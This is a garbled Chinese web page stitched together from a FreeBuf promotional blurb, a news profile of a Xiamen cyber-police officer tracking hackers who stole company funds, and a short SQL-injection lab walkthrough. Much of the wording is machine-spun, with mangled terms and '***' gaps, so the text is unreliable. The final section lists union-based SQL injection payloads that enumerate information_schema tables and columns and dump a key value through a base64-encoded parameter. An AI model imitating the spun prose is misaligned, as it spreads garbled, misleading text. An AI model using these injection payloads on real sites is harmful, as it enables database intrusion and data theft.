FreeBuf:黑客与我们技术性互动平台是一个着眼于高品质的全世界 *** 安全互联网媒体，另外也是发烧友们沟通交流、共享技术性的更好服务平台。为中国 *** 信息安全行业产生一抹社会正能量，传送真实的黑客与我们精神实质。

喜爱 *** 安全的人全是享受生活的人，爱安全性的人应当谢谢这一时期，应当谢谢比较发达的新闻资讯和媒体使我们能够 学习培训到这般多种多样的安全生产技术;可是另外喜爱安全性的人通常也会讨厌这一时期，中华民族繁杂的大环境，每日耳旁眼下某某某大黑客又进来饮茶了，某某某大中型电子商务又被拖库了，无时无刻的负电子着大家的耳朵里面，另外也对大家保持警惕，束缚着大家的个人行为。大家想为祖国的 *** 信息安全做出贡献，可是却又被各种各样各种各样一成不变乱七八糟的相关法律法规管束着。是的，热爱生活，放浪不羁，大家对技术性的挑选却挺累很不自由。

1.天天更新全世界全新的黑客、我们新闻资讯，以技术专业机敏的角度为您呈现不一样的视角和见解;

2.共享全世界全新最红的安全工器具，高品质的技术性文章内容，深层次分析每一个关键技术;

3.全国各地之一家致力于“ *** 安全行业的互联网媒体”，跟踪震撼各种 *** 安全高峰会;

4.中国更好是的安全性汇聚系统软件;

5.Freebufer Style的评价文化艺术;

6.大中型互动交流沟通交流小区。

Freebuf的问世:

二零一零年的寒露，夏季刚过去。天還是那麼酷热，一群喜爱安全性的人在国外一个不知名的idc开始了她们的逐梦旅途，从一开始，她们就了解，这条道路并不平整，可是她们却而为血脉喷张。相信，她们追求完美free的步伐会绝不滞留，也期待大量的人添加到她们之中。

FreeBuf关键精英团队由来源于美国硅谷、百度搜索、携程网、华为公司、阿里巴巴网、盛大游戏、相关部门等杰出从业者构成。

转截请标明出處：

打赏主播

洪毅强喜爱倒腾新技术应用，被大伙儿夸赞“有趣的笑话”多。新闻记者彭怡郡摄

厦门网讯 （海西晨报 新闻记者 彭怡郡 报道员 思公政）整日和黑客相处，科学研究全新的 *** 科技，在很多人印像中，网警公安民警便是理工男。殊不知，思明公安局“九零后”网警公安民警洪毅强却有点儿不一样，他性情活跃性，喜爱倒腾新技术应用，被大伙儿夸赞“有趣的笑话”多。但是，这种“有趣的笑话”并不是呆板地坐着电脑前面科学研究出去的，只是在黑客群臥底、和嫌疑人沟通交流技术性、阅览黑客常看的书本中获得的设计灵感。

一年半時间，洪毅强从“转行”的审理案件公安民警，晋升网警队的中坚力量。借助在农村基层所的审理案件工作经验，洪毅强追捕、审讯一肩挑，查获了几起我省甚至全国首例的新式互联网技术案子。

转型发展

“赶鸭发布”发展潜力暴发

二十五岁的洪毅强原来是开元公安局的审理案件公安民警，2018加入思明大队网警队。非该技术专业科班的他，一度给自己沒有技术性专长而忧虑。为了更好地迅速入门，洪毅强绷着一股拼劲，一头扎入工作上。“应对全新升级的生疏行业，我也好像一个弹黄，工作压力越大，弹得越高。”在学习过程中，本就善于思维逻辑的洪毅强潜能爆发，工作中迅速拥有成果。

在网警队中，洪毅强发觉，像银行帐户里的钱莫名其妙消退的案子经常发生。在一般的行骗案子中，受害者必须扫描二维码或者出示短信验证码后，钱才会被转出去。但在黑客违法犯罪中，受害者与嫌疑人从没有过触碰，货款消退乃至不容易留有印痕。

上年九月份，管辖区一家互联网公司警报称，其企业账户失窃500余万元。洪毅强整理数据信息时发觉，早在一个月前，该企业账户资产就已存有出现异常。“大家把 *** 服务器当作储放货款的小屋子。靠谱提款是以屋子大门进到，打开保险柜提款。前三次盗款，嫌疑人是科学上网而入，奔向保险箱。后2次，盗款方式进一步升級，乃至不用进入房间，就能盗取保险箱里的财产。”

那样的盗款 *** 转换成一行行繁杂的编码，掩藏在几千条系统日志数据信息中。每一次盗款，嫌疑人全是分次小量转走货款，把自己的盗款个人行为搞混在一切正常提款个人行为中，无法鉴别。洪毅强一条条科学研究，与技术专家讨论，花了两个星期時间找到嫌疑人留有的系统漏洞，从而复原出盗款技巧，取得成功锁住嫌疑人真实身份。

有的人觉得，找到嫌疑人真实身份后，判断工作中就完成了，洪毅强却感觉“回味无穷”。“黑客转帐的 *** 有很多，嫌疑人仅应用了在其中一种。我能尽量弄懂系统漏洞，找到大量很有可能存有的转帐 *** 。之后碰到相近案子时，能够 举一反三，更快寻找侦破重要。”洪毅强说。

电池充电

臥底黑客群把握暗号

“黑客的盗款个人行为就如同是偷了一辆单车，在缺乏视頻纪录的状况下，我想搞清楚单车是在什么时候被开启的、怎么解锁的、车辆也是怎样被骑走的。”洪毅强举的这一事例，把繁杂的黑客违法犯罪实地调查，以栩栩如生、易了解的 *** 复原出去。只不过是，在 *** 时代的违法犯罪，远比实际中的偷车个人行为繁杂得多。

五花八门的新生事物，全是黑客们进攻的目标。“時刻维持对工作中的 *** ，不断进步新技术应用，才可以迅速更准地破译黑客违法犯罪。”洪毅强说。

工作中，洪毅强发觉每一类黑客产业链都是有自身的技术专业暗号，要想掌握这种暗号，就需要融进在其中。因此，洪毅强悄悄地臥底在各种黑客群中。碰到搞不懂的专业术语，他也勇于在审讯中往嫌疑人“求教”。“懂了这种暗号，一件事协助很大。在别的案子审讯时，我可以揭穿嫌疑人的谎话，迅速地寻找直接证据。”他说道。

追捕

出乎意料进攻挽救数据信息

网警工作中不仅是线上上的技术 *** 锋，也是拓宽到线下推广的追捕行動。洪毅强说：“与一般嫌疑人对比，追捕黑客违法犯罪嫌疑人更注重 *** 和机会。机会准、速度更快，一定要保留住数据信息直接证据，断不可以让嫌疑人把数据删除。”

2018十二月，一公司警报称其企业 *** 服务器推流地址失窃，只是数十分钟，损害12余万元。在全国各地范畴内，该种类案子并未有查办例子。洪毅强铆足干劲，从服务器拉流体制刚开始科学研究，花了2个礼拜時间才总结了嫌疑人的偷盗技巧，并找到嫌疑人在江苏省盐城市的着力点。

嫌疑人十分奸诈，在江阴一个小区域内有四五处着力点。洪毅强一一清查，最后锁住了在其中多处。这两个着力点长期不打灯，无法探察房间内是不是有些人。洪毅强灵机一动，从电度表上寻找突破点。“房间内虽不打灯，但嫌疑人一定会开启计算机操作，电度表毫无疑问会走。”就是这样，洪毅强成功寻找嫌疑人最后的着力点。

但是，洪毅强沒有立刻执行追捕，只是挑选“刻舟求剑”。“大家想在嫌疑人执行违法犯罪时人赃俱获，尽量详细地保存数据信息。”上年十二月的江阴飘着雪，洪毅强领着工作人员蹲点了五六个钟头，的身上贴紧的暖宝宝贴早就没有了温暖。直到夜里11点，嫌疑人亲属出门丢垃圾时，洪毅强趁机冲进家内，控制住嫌疑人，保存了全部数据信息直接证据。

因为沒有判例，证据链健全也十分艰难，洪毅强查看了很多的类书、期刊论文及其法律条文，并与人民检察院数次沟通交流讨论，取得成功锁住证据链。

审讯

聊技术性攻克嫌疑人心防

因为曾在公安局披荆斩棘，在审讯层面，洪毅强把握了一定的专业技能。洪毅强表明，黑客违法犯罪的嫌疑人大多数是技术性“巨头”，强势的审讯 *** 不一定能有好实际效果。

他挑选“顺水推舟”，以探讨技术性做为突破点。他说道：“这是一个深交的全过程，要让嫌疑人信赖大家，审讯才可以成功。”

在哪起互联网技术企业账户失窃的案子中，嫌疑人陈某是个年轻人，黑客技术性一流。审讯时，洪毅强先白心某探讨时下时兴的黑客技巧。在这里全过程中，陈某提及自身以前也是有一份正儿八经工作中，为公司系统软件做安全防护，以后因权益引诱变成黑客。听见陈某谈起旧事，洪毅强了解自身早已获得其信赖。以后，洪毅强与之聊到了案子中的盗款技巧，陈某已不瞒报，一五一十地交待清晰了。这次审讯不断了8钟头，在这里全过程中，两个人“PK”沟通交流，洪毅强还从初中来到许多 *** 科技。

在2018、今年的净网行动中，洪毅强用那样的方式攻破了许多 嫌疑人，带头查获涉网主侦案子50起，抓捕违法犯罪嫌疑人73名。

进行阅读全文

表明：下边的URL为了更好地让阅读者能够 认清，因此沒有开展URL的base64数据加密，可是阅读者在实行前必须对其开展base64数据加密，以后才能够 一切正常实行！此次射击场实际操作以本人的试验自然环境为例子。

更先从我试验的射击场能够 见到该URL中存有一个主要参数，从主要参数的文件格式看来是根据了base64开展了数据加密，那麼我们可以对其开展base64破译。

发觉破译以后的主要参数为1，这类种类的引入除开和大家之前的一般引入对比仅仅多了一个“base64”数据加密的全过程，下边开展手工 *** 引入演试：

1、分辨是不是能够 引入：

and 检测；

由上分辨能够 获知存有SQL引入。

2、猜解字段距离

order by 2

order by 3

能够 猜到字段距离为2。

3、爆数据库查询名、数据库查询版本信息

4、爆棚名

union select TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--

5、爆字段

union select COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1

6、爆字段名值

union select thekey,2 from test.data limit 0,1--

到此获得最终的內容！

转截：